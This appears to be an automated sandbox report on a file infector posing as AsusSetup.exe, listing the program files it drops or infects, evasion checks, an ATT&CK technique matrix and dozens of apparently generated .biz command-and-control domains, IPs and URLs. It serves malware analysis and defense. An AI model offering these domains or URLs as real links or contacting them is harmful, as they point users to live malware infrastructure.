Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exe, Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\AsusSetup.exe, Code function: 0_2_02065346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h], lea ecx, dword ptr [eax-00000419h], lea ecx, dword ptr [eax-00000419h]
Source: C:\Windows\System32\AppVClient.exe, Code function: 6_2_00535346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h], lea ecx, dword ptr [eax-00000419h], lea ecx, dword ptr [eax-00000419h]
Source: C:\Windows\System32\FXSSVC.exe, Code function: 9_2_00425346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h], lea ecx, dword ptr [eax-00000419h], lea ecx, dword ptr [eax-00000419h]
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Code function: 10_2_02255346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h], lea ecx, dword ptr [eax-00000419h], lea ecx, dword ptr [eax-00000419h]
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_0-5674)
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_10-3902)
Source: C:\Windows\System32\FXSSVC.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_9-3895)
Source: C:\Windows\System32\AppVClient.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_6-3900)
Source: C:\Users\user\Desktop\AsusSetup.exe TID: 6856 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 6936 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 6864 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\alg.exe | Thread delayed: delay time: 60000
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: AsusSetup.exe, alg.exe | Binary or memory string: Hyper-V RAW
Source: AsusSetup.exe | Binary or memory string: Hyper-V RAWi
Source: AppVClient.exe | Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\AsusSetup.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\alg.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTB4E.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTB4F.tmp VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\AsusSetup.exe | Code function: 0_2_00000001401CB8F4 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, 0_2_00000001401CB8F4
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 2 LSASS Driver | 1 Process Injection | 222 Masquerading | 11 Input Capture | 1 System Time Discovery | 1 Taint Shared Content | 11 Input Capture | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 2 LSASS Driver | 11 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Process Injection | Security Account Manager | 11 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 12 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
[Behavior graph. ID: 1543957; Sample: AsusSetup.exe; Start date: 28/10/2024; Architecture: WINDOWS; Score: 96]

Source | Detection | Scanner | Label | Link
AsusSetup.exe | 100% | Avira | W32/Infector.Gen |
AsusSetup.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.openssl.org/support/faq.html | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                                                                                              unknown
                                                                                                              rrqafepng.biz
                                                                                                              47.129.31.212
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                typgfhb.biz
                                                                                                                13.251.16.150
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  esuzf.biz
                                                                                                                  34.211.97.45
                                                                                                                  truetrue
                                                                                                                    unknown
                                                                                                                    eufxebus.biz
                                                                                                                    18.141.10.107
                                                                                                                    truetrue
                                                                                                                      unknown
                                                                                                                      whjovd.biz
                                                                                                                      18.141.10.107
                                                                                                                      truetrue
                                                                                                                        unknown
                                                                                                                        uphca.biz
                                                                                                                        44.221.84.105
                                                                                                                        truefalse
                                                                                                                          unknown
                                                                                                                          htwqzczce.biz
                                                                                                                          172.234.222.138
                                                                                                                          truefalse
                                                                                                                            unknown
                                                                                                                            xyrgy.biz
                                                                                                                            18.208.156.248
                                                                                                                            truefalse
                                                                                                                              unknown
                                                                                                                              banwyw.biz
                                                                                                                              44.221.84.105
                                                                                                                              truefalse
                                                                                                                                unknown
                                                                                                                                myups.biz
                                                                                                                                165.160.15.20
                                                                                                                                truefalse
                                                                                                                                  unknown
                                                                                                                                  pwlqfu.biz
                                                                                                                                  34.246.200.160
                                                                                                                                  truefalse
                                                                                                                                    unknown
                                                                                                                                    zyiexezl.biz
                                                                                                                                    18.208.156.248
                                                                                                                                    truefalse
                                                                                                                                      unknown
                                                                                                                                      yauexmxk.biz
                                                                                                                                      18.208.156.248
                                                                                                                                      truefalse
                                                                                                                                        unknown
                                                                                                                                        hlzfuyy.biz
                                                                                                                                        34.211.97.45
                                                                                                                                        truetrue
                                                                                                                                          unknown
                                                                                                                                          ssbzmoy.biz
                                                                                                                                          18.141.10.107
                                                                                                                                          truetrue
                                                                                                                                            unknown
                                                                                                                                            knjghuig.biz
                                                                                                                                            18.141.10.107
                                                                                                                                            truetrue
                                                                                                                                              unknown
                                                                                                                                              yunalwv.biz
                                                                                                                                              208.100.26.245
                                                                                                                                              truefalse
                                                                                                                                                unknown
                                                                                                                                                brsua.biz
                                                                                                                                                3.254.94.185
                                                                                                                                                truefalse
                                                                                                                                                  unknown
                                                                                                                                                  rffxu.biz
                                                                                                                                                  34.246.200.160
                                                                                                                                                  truefalse
                                                                                                                                                    unknown
                                                                                                                                                    jlqltsjvh.biz
                                                                                                                                                    18.141.10.107
                                                                                                                                                    truetrue
                                                                                                                                                      unknown
                                                                                                                                                      mgmsclkyu.biz
                                                                                                                                                      34.246.200.160
                                                                                                                                                      truefalse
                                                                                                                                                        unknown
                                                                                                                                                        gjogvvpsf.biz
                                                                                                                                                        208.100.26.245
                                                                                                                                                        truefalse
                                                                                                                                                          unknown
                                                                                                                                                          qaynky.biz
                                                                                                                                                          13.251.16.150
                                                                                                                                                          truefalse
                                                                                                                                                            unknown
                                                                                                                                                            qpnczch.biz
                                                                                                                                                            18.246.231.120
                                                                                                                                                            truefalse
                                                                                                                                                              unknown
                                                                                                                                                              mnjmhp.biz
                                                                                                                                                              47.129.31.212
                                                                                                                                                              truefalse
                                                                                                                                                                unknown
                                                                                                                                                                acwjcqqv.biz
                                                                                                                                                                18.141.10.107
                                                                                                                                                                truetrue
                                                                                                                                                                  unknown
                                                                                                                                                                  jdhhbs.biz
                                                                                                                                                                  13.251.16.150
                                                                                                                                                                  truefalse
                                                                                                                                                                    unknown
                                                                                                                                                                    zrlssa.biz
                                                                                                                                                                    44.221.84.105
                                                                                                                                                                    truefalse
                                                                                                                                                                      unknown
                                                                                                                                                                      anpmnmxo.biz
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        zjbpaao.biz
                                                                                                                                                                        unknown
                                                                                                                                                                        unknowntrue
                                                                                                                                                                          unknown
                                                                                                                                                                          uhxqin.biz
                                                                                                                                                                          unknown
                                                                                                                                                                          unknowntrue
                                                                                                                                                                            unknown
                                                                                                                                                                            zlenh.biz
                                                                                                                                                                            unknown
                                                                                                                                                                            unknowntrue
                                                                                                                                                                              unknown
                                                                                                                                                                              muapr.biz
                                                                                                                                                                              unknown
                                                                                                                                                                              unknowntrue
                                                                                                                                                                                unknown
                                                                                                                                                                                lejtdj.biz
                                                                                                                                                                                unknown
                                                                                                                                                                                unknowntrue
                                                                                                                                                                                  unknown
Name    Malicious    Antivirus Detection    Reputation
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://kvbjaur.biz/xfalse
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://damcprvgv.biz/fvfalse
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://fwiwk.biz/yhrktnvbmfalse
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://uphca.biz/yfvdkcwfalse
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            http://npukfztj.biz/ywrwbyxrsfalse
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://fjumtfnz.biz/yjhdmcatglnakdtrue
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                http://ytctnunms.biz/dneetrunpbgfalse
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://warkcdu.biz/pmpevwipwdmvqitrue
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    http://vyome.biz/ckhsjhaxaevpxtdfalse
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      http://gytujflc.biz/mmdfpfalse
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://przvgke.biz/uyurjsjwfnxwfalse
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://rrqafepng.biz/lufcjqrcfalse
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            http://jhvzpcfg.biz/vbtgsklxqvscfalse
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://uaafd.biz/yefjfsfalse
                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                http://ftxlah.biz/jkvhfxewyayfhgfalse
                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                  http://xccjj.biz/bbxfalse
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://eufxebus.biz/xodwswpgarjchsqytrue
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      http://eufxebus.biz/kwcvpyammkduugrtrue
                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                        http://hlzfuyy.biz/mtrue
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          http://xyrgy.biz/gsepgksfalse
                                                                                                                                                                                                                                                                            unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                          https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filterjucheck.exe.2.drfalse
                                                                                                                                                                                                                                                                                                                            unknown
